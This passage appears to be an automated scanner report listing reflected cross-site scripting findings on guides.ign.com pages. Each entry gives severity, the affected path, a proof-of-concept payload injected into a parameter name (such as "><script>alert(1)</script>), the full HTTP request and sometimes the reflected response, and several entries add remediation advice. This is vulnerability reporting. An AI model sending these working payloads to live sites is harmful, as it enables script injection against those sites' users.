The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79fa1"><script>alert(1)</script>4d9b8b5138e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/14349501/?79fa1"><script>alert(1)</script>4d9b8b5138e=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.224. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14349501/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f36"-alert(1)-"33758481171 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/14349501/?a2f36"-alert(1)-"33758481171=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/14349501/?a2f36"-alert(1)-"33758481171=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.225. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14354229/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa952"-alert(1)-"9cf633cfd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.226. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14354229/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63fce"><script>alert(1)</script>0df05f822a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/14354229/?63fce"><script>alert(1)</script>0df05f822a8=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.227. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/57512/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b175"><script>alert(1)</script>368b0241e73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/57512/?2b175"><script>alert(1)</script>368b0241e73=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.228. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/57512/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d1a"-alert(1)-"2edcddf6365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/57512/?18d1a"-alert(1)-"2edcddf6365=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/57512/?18d1a"-alert(1)-"2edcddf6365=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.229. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/nintendo-ds-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7965"><script>alert(1)</script>dd303f9c616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.230. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/nintendo-ds-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae7f8"-alert(1)-"ca818502e9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/nintendo-ds-guides/index.html?ae7f8"-alert(1)-"ca818502e9b=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close